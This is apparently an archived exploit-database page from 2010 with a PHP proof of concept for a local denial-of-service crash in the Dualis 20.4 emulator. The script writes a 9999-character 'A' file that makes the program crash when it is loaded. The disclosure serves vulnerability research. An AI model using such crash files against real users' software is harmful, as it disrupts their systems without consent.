Home / os / winme

Dualis 20.4 (.bin) Local Daniel Of Service

Posted on 03 April 2010

========================================== Dualis 20.4 (.bin) Local Daniel Of Service ========================================== <?php # Dualis 20.4 (.bin) Local Daniel Of Service # Software Site: http://dualis.1emu.net/ # Software Download: http://dualis.1emu.net/files/dualis-20.4.zip # Author: Pr0T3cT10n <pr0t3ct10n@gmail.com<mailto:pr0t3ct10n@gmail.com>> # Site: http://www.nullbyte.org.il ################################################################## # Dualis 20.4 is vulnerable to local denial of service attack. # When we try to open a file by 'Load and Execute(CTRL+R)' # that contains 9999 chars ('A'), so dualis should crash. ################################################################## # PoC / Code: $buffer = str_repeat('A', 9999); # Create 9999 chars('A').. if(file_put_contents('crash.bin', $buffer)) { echo("File created successfuly. Dualis should crash when you open the file with it. "); } else { echo("Can't create file. Try again. "); } # Cya :) # NULLBYTE.ORG.IL #################### ?> # Inj3ct0r.com [2010-04-03]

 

TOP